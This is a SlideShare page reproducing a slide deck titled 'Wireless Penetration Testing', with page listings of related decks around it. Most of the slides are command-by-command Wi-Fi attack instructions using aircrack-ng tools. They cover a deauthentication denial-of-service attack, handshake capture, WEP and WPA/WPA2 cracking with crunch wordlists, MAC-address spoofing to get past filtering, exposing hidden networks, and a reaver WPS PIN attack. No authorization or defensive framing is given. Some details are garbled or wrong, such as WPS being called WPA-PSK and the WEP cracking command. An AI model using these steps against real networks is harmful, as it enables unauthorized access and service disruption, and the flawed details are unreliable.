SlideShare a Scribd company logo
1 of 12
WIRELESS PENETRATION TESTING
Kamlesh Dhanwani (@_gr4y_s3c70r)
PLAN
 Introduction
 Setting up a Wifi Hacking Environment
 DOS ATTACK ON WIFI
 WEP Security
 WPA Security OR WPA2 Security
 MAC ADDRESS Filtering
 HIDDEN Network
 WPA2 (WPS available)
Introduction
 Wi-Fi is short for "wireless fidelity,"
 Wireless Standard is IEEE 802.11
 Wireless Technology made huge change the
way of communication.
 The use of this technology is increasing day
by day,worldwide
 Raising concern about security standards.
Setting up a Wifi Hacking Environment
 PC/Laptop
 Wireless Network
 Wireless Adapter(Supports Monitor mode or
packet injection)
 Kali Linux OS/Wifislax
 Aircrack-ng(Tools for pentesting wifi)
DOS ATTACK ON WIFI
 Run Kali Linux and Plug Wireless adapter
 Open terminal and type #ifconfig wlan0 down
 #iwconfig wlan0 mode monitor
 #ifconfig wlan0 up
 #airmon-ng start wlan0
 #airodump-ng wlan0
DOS ATTACK ON WIFI
 #Airodump-ng –-channel<channel number> --
bssid<bssid of network> wlan0
 #aireplay-ng –deauth 0 -a <bssid of network>
wlan0
WEP Security
 WEP stands for Wired Equivalent Privacy. This is the first security
discovered of Wi-Fi invented in 1999 and crack within the year.
 Open 3 terminal
 1)DOS ATTACK
 2)airodump-ng –channel(channel no) –bssid(Bssid of network) -w wifi
(filename for handshake file) wlan0
 3)aircrack-ng -w wifi01.cap(.cap is a extension of handshake file)
 Note:- 3 steps in 3 terminals.
WPA Security OR WPA2 Security
 When WEP become easy to crack then WPA (Wi-Fi protected
access) is discovered. It has two formats WPA and wpa2 (this is
advance). WPA is secure as compare to WEP. But there are
chances that you can’t hack it.
 WPA Hacking By Wordlist Method using crunch
 We need To Capture Handshake
 1)DOS ATTACK ON Wifi Network
 2)airodump-ng –-channel(channel number) –-bssid(bssid number)
-w (filename) wlan0(FOR CAPTURE HANDSHAKE)
 3)Crunch 8 8 12345678 -o password.txt
 4)aircrack-ng -w password.txt filename.cap
MAC ADDRESS Filtering
 In this only allowed devices are able to connect the network.
You can view the WiFi network and try to connect to the
network.
 Every device has own identity like we have our name same
way devices has Mac address.
 Every device has a unique mac address. With the help of
mac, address admin allows only his device to connect the
WiFi. All other devices are unable to connect.
 You can’t change mac address permanently but you can
change it temporarily.
MAC ADDRESS Filtering
 Capture mac adress Airodump-ng
 ifconfig wlan0 down
 ifconfig wlan0 hw ether (mac address)
 ifconfig wlan0 up
HIDDEN Network
 To connect to Hidden WiFi you just need to know Network name.
After Finding network name chose “add network/Connect to
hidden WiFi” enter name of the network. That’s It.
 In Linux Hidden Wifi showing is in lenth and in Windows It shows
Hidden Network
 Use airodump-ng for see available network
 DOS Attack on Hidden Network It shows the name of Hidden
Network
WPA2 (WPS available)
 WPS stands for wireless protected Setup but it will insecure your
network. it is also known as WPA-PSK. In this, there is 8 digit pin
you can use this pin as a password.
 airmon-ng start wlan0
 airodump-ng wlan0mon Ctrl+c
 reaver -i wlan0mon -b (BSSID) -vv -K 1
 "This method is usually works on D-Link wifi routers ,but you can
try it on other routers."

More Related Content

What's hot

Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Security
Stephen Lahanas
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
Dharmesh Makwana
 

What's hot (20)

WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and Protection
 
Mobile security
Mobile securityMobile security
Mobile security
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptx
 
Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Security
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
Man in The Middle Attack
Man in The Middle AttackMan in The Middle Attack
Man in The Middle Attack
 
Mobile Device Security
Mobile Device SecurityMobile Device Security
Mobile Device Security
 
Network security and protocols
Network security and protocolsNetwork security and protocols
Network security and protocols
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Session hijacking by rahul tyagi
Session hijacking by rahul tyagiSession hijacking by rahul tyagi
Session hijacking by rahul tyagi
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
 
Firewall
FirewallFirewall
Firewall
 
What is Ransomware?
What is Ransomware?What is Ransomware?
What is Ransomware?
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 

Similar to Wireless penetration testing

Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
Mihir Shah
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
Hammam Samara
 

Similar to Wireless penetration testing (20)

Wi fi hacking
Wi fi hackingWi fi hacking
Wi fi hacking
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi Module
 
Networking Fundamentals
Networking FundamentalsNetworking Fundamentals
Networking Fundamentals
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Wireless Cyber Warfare
Wireless Cyber WarfareWireless Cyber Warfare
Wireless Cyber Warfare
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Network
NetworkNetwork
Network
 
COT1- SETTING UP WIRELES AB NETWORK.pptx
COT1- SETTING UP WIRELES AB NETWORK.pptxCOT1- SETTING UP WIRELES AB NETWORK.pptx
COT1- SETTING UP WIRELES AB NETWORK.pptx
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ng
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsBlack Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 

Recently uploaded

Recently uploaded (20)

Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties ReimaginedEasier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024Long journey of Ruby Standard library at RubyKaigi 2024
Long journey of Ruby Standard library at RubyKaigi 2024
 
Portal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russePortal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russe
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024TopCryptoSupers 12thReport OrionX May2024
TopCryptoSupers 12thReport OrionX May2024
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024   Teams Premium - Pretty SecureECS 2024   Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty Secure
 
AI mind or machine power point presentation
AI mind or machine power point presentationAI mind or machine power point presentation
AI mind or machine power point presentation
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 

Wireless penetration testing

  • 1. WIRELESS PENETRATION TESTING Kamlesh Dhanwani (@_gr4y_s3c70r)
  • 2. PLAN  Introduction  Setting up a Wifi Hacking Environment  DOS ATTACK ON WIFI  WEP Security  WPA Security OR WPA2 Security  MAC ADDRESS Filtering  HIDDEN Network  WPA2 (WPS available)
  • 3. Introduction  Wi-Fi is short for "wireless fidelity,"  Wireless Standard is IEEE 802.11  Wireless Technology made huge change the way of communication.  The use of this technology is increasing day by day,worldwide  Raising concern about security standards.
  • 4. Setting up a Wifi Hacking Environment  PC/Laptop  Wireless Network  Wireless Adapter(Supports Monitor mode or packet injection)  Kali Linux OS/Wifislax  Aircrack-ng(Tools for pentesting wifi)
  • 5. DOS ATTACK ON WIFI  Run Kali Linux and Plug Wireless adapter  Open terminal and type #ifconfig wlan0 down  #iwconfig wlan0 mode monitor  #ifconfig wlan0 up  #airmon-ng start wlan0  #airodump-ng wlan0
  • 6. DOS ATTACK ON WIFI  #Airodump-ng –-channel<channel number> -- bssid<bssid of network> wlan0  #aireplay-ng –deauth 0 -a <bssid of network> wlan0
  • 7. WEP Security  WEP stands for Wired Equivalent Privacy. This is the first security discovered of Wi-Fi invented in 1999 and crack within the year.  Open 3 terminal  1)DOS ATTACK  2)airodump-ng –channel(channel no) –bssid(Bssid of network) -w wifi (filename for handshake file) wlan0  3)aircrack-ng -w wifi01.cap(.cap is a extension of handshake file)  Note:- 3 steps in 3 terminals.
  • 8. WPA Security OR WPA2 Security  When WEP become easy to crack then WPA (Wi-Fi protected access) is discovered. It has two formats WPA and wpa2 (this is advance). WPA is secure as compare to WEP. But there are chances that you can’t hack it.  WPA Hacking By Wordlist Method using crunch  We need To Capture Handshake  1)DOS ATTACK ON Wifi Network  2)airodump-ng –-channel(channel number) –-bssid(bssid number) -w (filename) wlan0(FOR CAPTURE HANDSHAKE)  3)Crunch 8 8 12345678 -o password.txt  4)aircrack-ng -w password.txt filename.cap
  • 9. MAC ADDRESS Filtering  In this only allowed devices are able to connect the network. You can view the WiFi network and try to connect to the network.  Every device has own identity like we have our name same way devices has Mac address.  Every device has a unique mac address. With the help of mac, address admin allows only his device to connect the WiFi. All other devices are unable to connect.  You can’t change mac address permanently but you can change it temporarily.
  • 10. MAC ADDRESS Filtering  Capture mac adress Airodump-ng  ifconfig wlan0 down  ifconfig wlan0 hw ether (mac address)  ifconfig wlan0 up
  • 11. HIDDEN Network  To connect to Hidden WiFi you just need to know Network name. After Finding network name chose “add network/Connect to hidden WiFi” enter name of the network. That’s It.  In Linux Hidden Wifi showing is in lenth and in Windows It shows Hidden Network  Use airodump-ng for see available network  DOS Attack on Hidden Network It shows the name of Hidden Network
  • 12. WPA2 (WPS available)  WPS stands for wireless protected Setup but it will insecure your network. it is also known as WPA-PSK. In this, there is 8 digit pin you can use this pin as a password.  airmon-ng start wlan0  airodump-ng wlan0mon Ctrl+c  reaver -i wlan0mon -b (BSSID) -vv -K 1  "This method is usually works on D-Link wifi routers ,but you can try it on other routers."